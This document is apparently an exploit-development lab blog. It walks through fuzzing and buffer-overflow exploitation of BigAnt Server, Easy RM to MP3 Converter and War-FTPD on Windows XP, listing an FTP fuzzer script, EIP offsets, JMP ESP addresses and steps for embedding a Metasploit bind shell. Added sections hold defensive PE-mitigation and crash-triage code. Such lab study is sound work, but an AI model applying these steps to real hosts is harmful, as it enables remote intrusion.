=======================================================

Friday, September 28, 2012

Buffer Overflow ( SEH ): Bigant Server ( 2.52 )

Back to exploitation: this time a buffer overflow with an SEH overwrite in the BigAnt application. Let's hunt:

1. Create a fuzzer with Python.

2. Run BigAnt on Windows XP.

3. Run the fuzzer ==> # python fuzzer.py

4. To see the effect of the fuzzer, open OllyDbg.

5. View ==> SEH chain, then Shift+F9.

6. Search the running library (.dll) for a POP POP RETN sequence to jump through
    ==> In this case use vbajet32.dll

7. Copy vbajet32.dll to BackTrack and check its DllCharacteristics with msfpescan.
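
Step 7 checks the module's DllCharacteristics with msfpescan. The header-only check below is an added example, not the post's own code and not msfpescan: it walks the PE headers and reports which of the DEP, ASLR and NO_SEH opt-in bits a module sets, which is the same audit a defender runs to find modules that weaken process-wide mitigations. The PE header it builds with build_sample_pe() is constructed for the test and is not vbajet32.dll.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",        # ASLR opt-in
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",           # DEP opt-in
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",              # image declares it uses no SEH handlers
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def dll_characteristics(data):
    """Return (magic, DllCharacteristics) from a raw PE file image.
    Walks MZ -> e_lfanew -> PE signature -> COFF header -> optional header;
    DllCharacteristics sits at optional-header offset 70 for PE32 and PE32+."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)   # SizeOfOptionalHeader
    opt = coff + 20                                           # COFF header is 20 bytes
    if opt_size < 72 or len(data) < opt + 72:
        raise ValueError("optional header truncated")
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unexpected optional header magic 0x%x" % magic)
    (flags,) = struct.unpack_from("<H", data, opt + 70)
    return magic, flags


def flag_names(flags):
    """Human-readable names of the bits set in DllCharacteristics."""
    return [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if flags & bit]


def missing_mitigations(flags):
    """Mitigations the module does not opt into. Caveat: NO_SEH only says the
    image registers no handlers at all; SafeSEH proper lives in the Load Config
    directory (SEHandlerTable), which this header-only check does not read."""
    wanted = {0x0040: "ASLR (DYNAMIC_BASE)", 0x0100: "DEP (NX_COMPAT)", 0x0400: "NO_SEH"}
    return [name for bit, name in wanted.items() if not flags & bit]


def build_sample_pe(flags):
    """Constructed, minimal PE32 header (not loadable) used as test input."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                           # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)  # i386, DLL, 224-byte optional header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<H", opt, 70, flags)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def audit(data):
    """Summary a reviewer wants per loaded module."""
    magic, flags = dll_characteristics(data)
    return {"pe32plus": magic == PE32PLUS_MAGIC,
            "flags": flag_names(flags),
            "missing": missing_mitigations(flags)}


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe(0)
    print(audit(blob))
```

Run it with the path to a module as the only argument; with no argument it audits the constructed legacy-style header, which sets none of the bits. A module with an empty "missing" list is one that opts into every header-level mitigation; one with NO_SEH absent still needs the Load Config check before concluding anything about SafeSEH.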


8. Open the module vbajet32.dll ==> Executable Modules ==> Search for
     ==> Sequence of commands

9. Search for POP POP RETN to get its address.

10. Now look for the address used to control the CPU.

11. Look for the offset ==> create a pattern with Msf ==> put it in the fuzzer

12. Run the fuzzer and see the result.

13. View ==> SEH chain to see the SEH result

14. Shift+F9 ==> see the value in EIP ==> check the offset value with pattern_offset

15. Check bad characters ==> if the SEH chain points into vbajet32.dll, it looks good.

==> I will explain how to observe bad chars in the next section

        Assume we know the bad chars are 0x00 0x0a 0x0d 0x20 0x25

16. Generate the payload with msfweb

17. Modify the fuzzer with the payload content.

18. Execute the fuzzer & telnet

==> DONE <==

===================================================================================
===================================================================================




Wednesday, September 26, 2012

Making Winamp Crash With a Fuzzer

How do you make Winamp crash? Why do it? ==> to look for a vulnerability. Let's try:

A. Using an .swf file-extension fuzzer.

     1. Create a fuzzer (with Python).

     2. Open it in Winamp.

     3. Result

B. Replace the file timer.w5s with the fuzzer file

     1. Go to the directory ==> C:\Program Files\Winamp\System
     2. Create a fuzzer with Python

     3. Replace the file timer.w5s with the fuzzer file.
     4. Run Winamp (it will crash)

      ==> Crash

The goal is to find an EIP overwrite, but I have not found one.

"Try Harder"

===================================================================================
===================================================================================


Monday, September 24, 2012

Buffer Overflow: Local Exploit (Easy RM 2 MP3 Converter)

Now I will try a local exploitation. The application used for the exploitation is Easy RM to MP3 Converter. Tools used:
a. OllyDbg
b. Python
c. The application (Easy RM to MP3 Converter).

  NOTE:

# after each change to the fuzzer script, it must be saved and run again.

( python <file.py> )




Let's do this job:
1. Run Windows XP and install Easy RM to MP3 Converter.

2. Create a fuzzer file with a Python script that writes a playlist file (.m3u, .pls etc.).
      ==> run the file Fuzz.py ==> # python Fuzz.py

==> this creates the fuzzer (playlist) file.

3. Run the application and try to load the playlist file (crash.pls).
     ==> If the fuzzer succeeds the application will crash (close automatically).

4. Run the application again, this time under OllyDbg, to see the overwritten registers.

==> Result: EBX and ESP are overwritten with the character "B".

5. Create a pattern ==> with Metasploit ==> ./create_pattern 60000 > file.txt

6. Modify the fuzzer script with the pattern.

7. Look for the offset position.

8. Check the position of the EIP register ==> \xEF\xBE\xAD\xDE

==> Run python <file>.py

9. Look for a JMP ESP address

==> JMP ESP address => 7CA7A787 => (little endian) => \x87\xA7\xA7\x7C

10. Generate the payload with msfweb ==> Windows Bind Shell

 ==> Generate payload

11. Modify the fuzzer script with the payload.

12. Run the fuzzer script to create the final playlist file with the payload content.

==> Run telnet => # telnet 192.168.56.101 4444

 == DONE ==


===================================================================================
===================================================================================

Monday, September 17, 2012

Buffer Overflow: War-FTPD with OllyDbg and Msf (Python Fuzzer Script)

I will try to exploit the War-FTPD application using the buffer overflow method. To see whether a piece of software can be overflowed, try fuzzing. Let's try:
1. Install War-FTPD and OllyDbg on Windows XP

2. Create a fuzzer script with Python.
#!/usr/bin/python
import socket

# Test buffer: 1500 'A' (0x41) bytes sent as the USER argument.
# (The original "\41" was an octal escape for "!", not 0x41.)
buffer = b"\x41" * 1500

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.56.101', 21))   # War-FTPD test host in the lab
data = s.recv(1024)                 # read the FTP banner
print("KIRIM....")
s.send(b'USER ' + buffer + b'\r\n')  # FTP lines end in CRLF, no space
data = s.recv(1024)
s.send(b'PASS ' + b'\r\n')
s.close()
print("Finish")

Save it as <name>.py

3. Run the script ==> # python <name>.py
War-FTPD will crash because of the buffer overflow.

Now I check whether EIP in War-FTPD can be overwritten.

4. Create a pattern with pattern_create in the directory ==> /pentest/exploits/framework/tools/
==> to view it open buffer.txt

5. Create a fuzzer with the buffer content from buffer.txt

6. Execute the fuzzer and see the register values

7. Check the pattern offset of EIP and ESP ==> /pentest/exploits/framework/tools/
     ==> ./pattern_offset.rb 32714131 ==> 485
     ==> ./pattern_offset.rb aq4Aq      ==> 493
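
The pattern steps above (and the matching pattern_create / pattern_offset steps in the Easy RM to MP3 and BigAnt posts) answer one crash-triage question: which bytes of the input ended up in EIP and where ESP points inside the input. That answer is what decides whether a crash is an instruction-pointer overwrite (high severity, bounds check needed on that field) or just a wild read. Added example, not the post's code and not Metasploit's: a Python reimplementation of the cyclic pattern with a small triage helper. The EIP value 32714131 is the one shown above; the ESP substring "q4Aq" is constructed.

```python
import string
import struct

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits
PERIOD = len(UPPER) * len(LOWER) * len(DIGITS) * 3   # 20280 bytes before the pattern repeats


def pattern_create(length):
    """Build a cyclic pattern in the pattern_create style (Aa0Aa1Aa2 ... Zz9),
    truncated to `length` bytes; every 3-byte group is unique within one period."""
    chunks = []
    total = 0
    while total < length:
        for u in UPPER:
            for lo in LOWER:
                for d in DIGITS:
                    chunks.append(u + lo + d)
                    total += 3
                    if total >= length:
                        return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def register_to_bytes(value):
    """Turn a 32-bit register value as the debugger shows it ('32714131' or
    0x32714131) into the 4 ASCII bytes that sat in memory, little-endian."""
    if isinstance(value, str):
        value = int(value, 16)
    return struct.pack("<I", value).decode("ascii")


def offset_from_register(pattern, value):
    """Offset in the input of the bytes now in the register, or None when the
    register does not hold pattern bytes (a library address, for instance)."""
    try:
        needle = register_to_bytes(value)
    except UnicodeDecodeError:
        return None
    idx = pattern.find(needle)
    return None if idx < 0 else idx


def offset_from_string(pattern, text):
    """Offset of a substring observed in a memory dump (e.g. the bytes at ESP)."""
    idx = pattern.find(text)
    return None if idx < 0 else idx


def triage(pattern, eip, esp_text):
    """What the crash tells a reviewer: whether EIP was filled from the input
    (and at which offset) and how much input lies beyond where ESP points."""
    eip_off = offset_from_register(pattern, eip)
    esp_off = offset_from_string(pattern, esp_text)
    return {
        "eip_controlled": eip_off is not None,
        "eip_offset": eip_off,
        "esp_offset": esp_off,
        "bytes_after_esp": None if esp_off is None else len(pattern) - esp_off,
    }


if __name__ == "__main__":
    pat = pattern_create(1500)
    # EIP value from the War-FTPD step; ESP dump text is constructed.
    print(triage(pat, "32714131", "q4Aq"))
```

Because the search is done on the little-endian byte order of the register, the hex value is typed exactly as OllyDbg shows it; a register that holds a module address rather than input bytes comes back as None, which is the "not controlled" answer.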

8. To verify that register EIP gets its value from the fuzzer => modify the fuzzer according to the pattern offset.

See that EIP gets its value from the fuzzer.

9. Modify the fuzzer to give a value to ESP (1000 - 493)

Result when the fuzzer is executed

10. Search for a JMP ESP address

Jump address ==> 7C9D30D7 ==> \xD7\x30\x9D\x7C

11. Create a fuzzer to test the jump address.

Result:

12. Create the payload with msfweb ==> /pentest/exploits/framework2/ ==> open 127.0.0.1:55555

==> Windows bind shell code ==> Process ==> Restricted chars 0x00 0x0a 0x0d ==> shikata_ga_nai
==> Copy the payload into the fuzzer and run it.

==> Fuzzer script
==> Run the fuzzer

==> Run telnet (exploited) == DONE

==========================================================================
==========================================================================

